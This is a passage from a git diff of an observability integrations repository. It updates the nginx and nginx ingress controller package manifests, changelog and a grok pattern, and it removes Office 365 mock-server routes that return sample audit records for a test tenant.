(ipv4:port or [ipv6]:port) or a resource path (sockets). | keyword | | | service.type | The type of the service data is collected from. The type can be used to group and correlate logs and metrics from one service type. Example: If logs or metrics are collected from Elasticsearch, `service.type` would be `elasticsearch`. | keyword | | +| tags | List of keywords used to tag each event. | keyword | | ## ML Modules diff --git a/packages/nginx/manifest.yml b/packages/nginx/manifest.yml index ddc6cd142ab..4935ef5e13f 100644 --- a/packages/nginx/manifest.yml +++ b/packages/nginx/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: nginx title: Nginx -version: "1.17.0" +version: "1.20.0" description: Collect logs and metrics from Nginx HTTP servers with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - observability conditions: kibana: - version: "^8.8.0" + version: "^8.12.0" elastic: subscription: basic screenshots: @@ -65,10 +65,12 @@ policy_templates: type: password title: Splunk REST API Password show_user: true + secret: true required: false - name: token type: password title: Splunk Authorization Token + secret: true description: | Bearer Token or Session Key, e.g. "Bearer eyJFd3e46..." or "Splunk 192fd3e...". Cannot be used with username diff --git a/packages/nginx_ingress_controller/changelog.yml b/packages/nginx_ingress_controller/changelog.yml index df39c7665bd..9c8731bc161 100644 --- a/packages/nginx_ingress_controller/changelog.yml +++ b/packages/nginx_ingress_controller/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.8.3" + changes: + - description: Fix ingest pipeline warnings + type: bugfix + link: https://github.com/elastic/integrations/pulls/9574 - version: "1.8.2" changes: - description: Migrate Access and error logs dashboard visualizations to lens. diff --git a/packages/nginx_ingress_controller/data_stream/error/elasticsearch/ingest_pipeline/default.yml b/packages/nginx_ingress_controller/data_stream/error/elasticsearch/ingest_pipeline/default.yml index 48af0f4ae68..8ceedce01fb 100644 --- a/packages/nginx_ingress_controller/data_stream/error/elasticsearch/ingest_pipeline/default.yml +++ b/packages/nginx_ingress_controller/data_stream/error/elasticsearch/ingest_pipeline/default.yml @@ -12,7 +12,7 @@ processors: - grok: field: event.original patterns: - - '%{LOG_LEVEL:log.level}%{MONTHNUM2:timestamp_month}%{MONTHDAY:timestamp_day} %{HOUR:timestamp_hour}:%{MINUTE:timestamp_minute}:%{SECOND:timestamp_second}.%{NANOS:timestamp_nano}%{SPACE}%{NUMBER:nginx_ingress_controller.error.thread_id} %{SOURCE_FILE:nginx_ingress_controller.error.source.file}:%{NUMBER:nginx_ingress_controller.error.source.line_number}] %{GREEDYMULTILINE:message}' + - '%{LOG_LEVEL:log.level}%{MONTHNUM2:timestamp_month}%{MONTHDAY:timestamp_day} %{HOUR:timestamp_hour}:%{MINUTE:timestamp_minute}:%{SECOND:timestamp_second}.%{NANOS:timestamp_nano}%{SPACE}%{NUMBER:nginx_ingress_controller.error.thread_id} %{SOURCE_FILE:nginx_ingress_controller.error.source.file}:%{NUMBER:nginx_ingress_controller.error.source.line_number}\] %{GREEDYMULTILINE:message}' pattern_definitions: LOG_LEVEL: '[A-Z]{1}' NANOS: '[0-9]{6}' diff --git a/packages/nginx_ingress_controller/manifest.yml b/packages/nginx_ingress_controller/manifest.yml index 9afb516dc6e..f0ac35a6a30 100644 --- a/packages/nginx_ingress_controller/manifest.yml +++ b/packages/nginx_ingress_controller/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: nginx_ingress_controller title: Nginx Ingress Controller Logs -version: 1.8.2 +version: 1.8.3 license: basic description: Collect Nginx Ingress Controller logs. type: integration diff --git a/packages/o365/_dev/deploy/docker/config.yml b/packages/o365/_dev/deploy/docker/config.yml index dc6c52dafdf..f5d62944070 100644 --- a/packages/o365/_dev/deploy/docker/config.yml +++ b/packages/o365/_dev/deploy/docker/config.yml @@ -18,227 +18,6 @@ rules: - "application/json" body: |- {"access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN","token_type": "Bearer","not_before": 1549647431,"expires_in": 3600,"resource": "f2a76e08-93f2-4350-833c-965c02483b11"} - - path: /api/v1.0/tenant-id/activity/feed/subscriptions/content - methods: [GET] - query_params: - contentType: "Audit.AzureActiveDirectory" - startTime: "{startTime:.*}" - endTime: "{endTime:.*}" - publisherIdentifier: tenant-id - request_headers: - Authorization: - - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" - responses: - - status_code: 200 - headers: - Content-Type: - - "application/json" - body: |- - [ - { - "contentType": "Audit.AzureActiveDirectory", - "contentId": "id1", - "contentUri": "http://{{ hostname }}:{{ env "PORT" }}/api/v1.0/aad1/activity/feed/audit/id1", - "contentCreated": "{{ .request.vars.endTime }}Z", - "contentExpiration": "2199-05-30T17:35:00.000Z" - } - ] - - path: /api/v1.0/aad1/activity/feed/audit/id1 - methods: [GET] - query_params: - publisherIdentifier: tenant-id - request_headers: - Authorization: - - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" - responses: - - status_code: 200 - headers: - Content-Type: - - "application/json" - body: |- - [ - {"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:33:26.1037807Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438635"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "8f6eb24b-6e61-4ee2-a376-31368c300613"}, - {"InterSystemsId": "03616b3a-fc75-46a1-b34a-2d82fc8f1e7e", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:13", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c4206c29-46c2-4a6f-a46b-735107705400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "ca0efc24-1b89-4962-8fef-a3ac5437302f"} - ] - - path: /api/v1.0/tenant-id/activity/feed/subscriptions/content - methods: [GET] - query_params: - contentType: "Audit.Exchange" - startTime: "{startTime:.*}" - endTime: "{endTime:.*}" - publisherIdentifier: tenant-id - request_headers: - Authorization: - - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" - responses: - - status_code: 200 - headers: - Content-Type: - - "application/json" - body: |- - [ - { - "contentType": "Audit.Exchange", - "contentId": "id1", - "contentUri": "http://{{ hostname }}:{{ env "PORT" }}/api/v1.0/exch1/activity/feed/audit/id1", - "contentCreated": "{{ .request.vars.endTime }}Z", - "contentExpiration": "2199-05-30T17:35:00.000Z" - } - ] - - path: /api/v1.0/exch1/activity/feed/audit/id1 - methods: [GET] - query_params: - publisherIdentifier: tenant-id - request_headers: - Authorization: - - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" - responses: - - status_code: 200 - headers: - Content-Type: - - "application/json" - body: |- - [ - {"OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", "ClientAppId": "", "OrganizationName": "testsiem.onmicrosoft.com", "RecordType": 1, "ObjectId": "testsiem.onmicrosoft.com\\Transport Settings", "Workload": "Exchange", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "UserId": "NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)", "CreationTime": "2020-02-10T07:37:13", "Parameters": [{"Name": "DomainController", "Value": ""}, {"Name": "Identity", "Value": "testsiem.onmicrosoft.com"}, {"Name": "OrganizationFederatedMailbox", "Value": "FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com"}], "UserType": 3, "Version": 1, "ResultStatus": "True", "AppId": "", "ExternalAccess": true, "UserKey": "NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)", "Operation": "Set-TransportConfig", "Id": "ea769bfc-fa67-465c-767a-08d7adfc0b7b"}, - {"OrganizationName":"testsiem.onmicrosoft.com","UserKey":"S-1-5-18","MailboxGuid":"26286ffa-073d-45ff-9fe9-539891984d69","Operation":"ModifyFolderPermissions","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","ClientIPAddress":"::1","Item":{"Id":"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC","ParentFolder":{"Path":"\\Calendar","MemberRights":"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed","MemberSid":"S-1-8-640184314-1174341437-2555636127-1766693009-0","Id":"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC","MemberUpn":"Owner@local","Name":"Calendar"}},"AdditionalInfo":{"EnvironmentName":"Default-ae81357b-84e6-4e54-b02c-db7dddd1e869"},"AppAccessContext":{"ClientAppId":"89118fb4-83bf-46d9-bb84-78cca4c122d5"},"LogonUserSid":"S-1-5-18","OriginatingServer":"AM6PR01MB4535 (15.20.229.32)\n","RecordType":2,"Version":1,"ClientInfoString":"Client=WebServices;Action=ConfigureGroupMailbox","MailboxOwnerUPN":"SIEMTest@testsiem.onmicrosoft.com","MailboxOwnerMasterAccountSid":"S-1-5-10","MailboxOwnerSid":"S-1-5-21-3422892061-1135328251-2670905592-26680073","ResultStatus":"Succeeded","ExternalAccess":true,"LogonType":1,"ClientIP":"::1","Workload":"Exchange","InternalLogonType":1,"UserId":"S-1-5-18","CreationTime":"2020-02-17T17:12:03","Id":"284dfe85-ab53-48ad-0863-08d7b3cc81f7","UserType":2} - ] - - path: /api/v1.0/tenant-id/activity/feed/subscriptions/content - methods: [GET] - query_params: - contentType: "Audit.SharePoint" - startTime: "{startTime:.*}" - endTime: "{endTime:.*}" - publisherIdentifier: tenant-id - request_headers: - Authorization: - - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" - responses: - - status_code: 200 - headers: - Content-Type: - - "application/json" - body: |- - [ - { - "contentType": "Audit.Sharepoint", - "contentId": "id1", - "contentUri": "http://{{ hostname }}:{{ env "PORT" }}/api/v1.0/sp1/activity/feed/audit/id1", - "contentCreated": "{{ .request.vars.endTime }}Z", - "contentExpiration": "2199-05-30T17:35:00.000Z" - } - ] - - path: /api/v1.0/sp1/activity/feed/audit/id1 - methods: [GET] - query_params: - publisherIdentifier: tenant-id - request_headers: - Authorization: - - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" - responses: - - status_code: 200 - headers: - Content-Type: - - "application/json" - body: |- - [ - {"ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "ItemType": "Page", "Workload": "OneDrive", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "UserId": "asr@testsiem.onmicrosoft.com", "CreationTime": "2020-02-07T16:43:53", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "ClientIP": "213.97.47.133", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "UserType": 0, "Version": 1, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "CustomUniqueId": true, "Operation": "PageViewed", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", "Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "RecordType": 4}, - {"UserId": "asr@testsiem.onmicrosoft.com", "ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "RecordType": 4, "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", "Workload": "OneDrive", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "UserType": 0, "CreationTime": "2020-02-07T16:43:53", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "ClientIP": "213.97.47.133", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "Version": 1, "EventSource": "SharePoint", "CustomUniqueId": true, "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "Operation": "PageViewed", "Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "ItemType": "Page"}, - {"Workload": "OneDrive", "Version": 1, "RecordType": 4, "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "UserId": "asr@testsiem.onmicrosoft.com", "CreationTime": "2020-02-07T16:43:53", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "UserType": 0, "ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "CustomUniqueId": true, "ClientIP": "213.97.47.133", "Operation": "PageViewed", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "ItemType": "Page"}, - {"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:23", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "SourceRelativeUrl": "Documents", "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ClientIP": "213.97.47.133", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SourceFileName": "Screenshot.png", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ItemType": "File", "ListItemUniqueId": "7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileModified", "Id": "5b02fadb-8eac-4aff-af87-08d7abecfca3"}, - {"SourceRelativeUrl": "Documents", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:07", "ListId": "2b6ad2bd-0fd7-4556-9c89-a97847085b85", "Version": 1, "RecordType": 6, "UserId": "asr@testsiem.onmicrosoft.com", "SourceFileExtension": "png", "UserType": 0, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "ClientIP": "213.97.47.133", "CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b", "Workload": "OneDrive", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "SourceFileName": "Screenshot 2020-01-27 at 11.30.48.png", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "ItemType": "File", "ListItemUniqueId": "4803608a-df7d-4f63-aa73-67aa33bb576e", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Operation": "FileDeleted", "Id": "ec04aa09-0a43-4879-cdc8-08d7abecf327"}, - {"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","ItemType":"File","UserKey":"i:0h.f|membership|1003200096971f55@live.com","TargetUserOrGroupName":"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"SharingSet","EventData":"System.LimitedEdit","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","SourceFileName":"Screenshot.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","ClientIP":"79.159.10.151","SourceFileExtension":"png","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot.png","EventSource":"SharePoint","TargetUserOrGroupType":"SecurityGroup","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:44","Id":"98633e47-3540-4e8a-bcfc-08d7b17b4e48","UserType":0} - ] - - path: /api/v1.0/tenant-id/activity/feed/subscriptions/content - methods: [GET] - query_params: - contentType: "Audit.General" - startTime: "{startTime:.*}" - endTime: "{endTime:.*}" - publisherIdentifier: tenant-id - request_headers: - Authorization: - - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" - responses: - - status_code: 200 - headers: - Content-Type: - - "application/json" - body: |- - [ - { - "contentType": "Audit.General", - "contentId": "id1", - "contentUri": "http://{{ hostname }}:{{ env "PORT" }}/api/v1.0/gen1/activity/feed/audit/id1", - "contentCreated": "{{ .request.vars.endTime }}Z", - "contentExpiration": "2199-05-30T17:35:00.000Z" - } - ] - - path: /api/v1.0/gen1/activity/feed/audit/id1 - methods: [GET] - query_params: - publisherIdentifier: tenant-id - request_headers: - Authorization: - - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" - responses: - - status_code: 200 - headers: - Content-Type: - - "application/json" - body: "[\n {\"ObjectId\":\"Sales\",\"Id\":\"2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594\",\"CreationTime\":\"2020-02-28T09:42:45\",\"UserKey\":\"100320009d6edf94\",\"YammerNetworkId\":5846122497,\"Operation\":\"GroupCreation\",\"ClientIP\":\"79.159.10.151:12345\",\"ActorYammerUserId\":36787265537,\"UserType\":0,\"ResultStatus\":\"TRUE\",\"RecordType\":22,\"Workload\":\"Yammer\",\"Version\":1,\"GroupName\":\"Sales\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"UserId\":\"alice@testsiem2.onmicrosoft.com\",\"ActorUserId\":\"alice@testsiem2.onmicrosoft.com\"},\n {\"CreationTime\":\"2020-02-28T09:39:20\",\"ActorUserId\":\"asr@testsiem2.onmicrosoft.com\",\"ObjectId\":\"Company group\",\"UserKey\":\"100320009d292e16\",\"Id\":\"3f3e7f1c-84c1-55fc-9bb2-c8b8563eae06\",\"ActorYammerUserId\":36085768193,\"ClientIP\":\"[fdfd::555]:12346\",\"UserId\":\"asr@testsiem2.onmicrosoft.com\",\"Operation\":\"GroupCreation\",\"ResultStatus\":\"TRUE\",\"UserType\":0,\"Workload\":\"Yammer\",\"Version\":1,\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"YammerNetworkId\":5846122497,\"RecordType\":22,\"GroupName\":\"Company group\"},\n {\"RecordType\":25,\"Version\":1,\"TeamGuid\":\"19:5ad83cb367fc48358e759dccff238f46@thread.skype\",\"UserId\":\"Application\",\"UserKey\":\"\",\"CreationTime\":\"2020-02-17T16:59:44\",\"TeamName\":\"SIEMTest\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"Operation\":\"TeamCreated\",\"Id\":\"49fa9883-50a9-4c9c-8e12-57e0948a9d8a\",\"UserType\":5,\"Workload\":\"MicrosoftTeams\"},\n {\"TeamGuid\":\"19:5ad83cb367fc48358e759dccff238f46@thread.skype\",\"UserKey\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"TeamName\":\"SIEMTest\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"Operation\":\"MemberAdded\",\"Workload\":\"MicrosoftTeams\",\"RecordType\":25,\"Version\":1,\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"CreationTime\":\"2020-02-17T16:59:47\",\"ItemName\":\"SIEMTest\",\"Id\":\"3a951c24-3214-5529-b2fe-097628a39ecd\",\"UserType\":0,\"Members\":[{\"Role\":1,\"UPN\":\"david@testsiem.onmicrosoft.com\",\"DisplayName\":\"David\"},{\"Role\":1,\"UPN\":\"chuck@testsiem.onmicrosoft.com\",\"DisplayName\":\"Chuck\"},{\"Role\":1,\"UPN\":\"bob@testsiem.onmicrosoft.com\",\"DisplayName\":\"Bob\"},{\"Role\":1,\"UPN\":\"alice@testsiem.onmicrosoft.com\",\"DisplayName\":\"Alice\"}]},\n {\"TeamGuid\":\"19:5ad83cb367fc48358e759dccff238f46@thread.skype\",\"UserKey\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"TeamName\":\"SIEMTest\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"Operation\":\"MemberAdded\",\"Workload\":\"MicrosoftTeams\",\"RecordType\":25,\"Version\":1,\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"CreationTime\":\"2020-02-17T16:59:44\",\"ItemName\":\"SIEMTest\",\"Id\":\"3350cfd2-1020-5b11-99d8-2701f3a29ea3\",\"UserType\":0,\"Members\":[{\"Role\":2,\"UPN\":\"asr@testsiem.onmicrosoft.com\",\"DisplayName\":\"Alan Smithee\"}]},\n {\"RecordType\":25,\"Version\":1,\"ObjectId\":\"Unknown 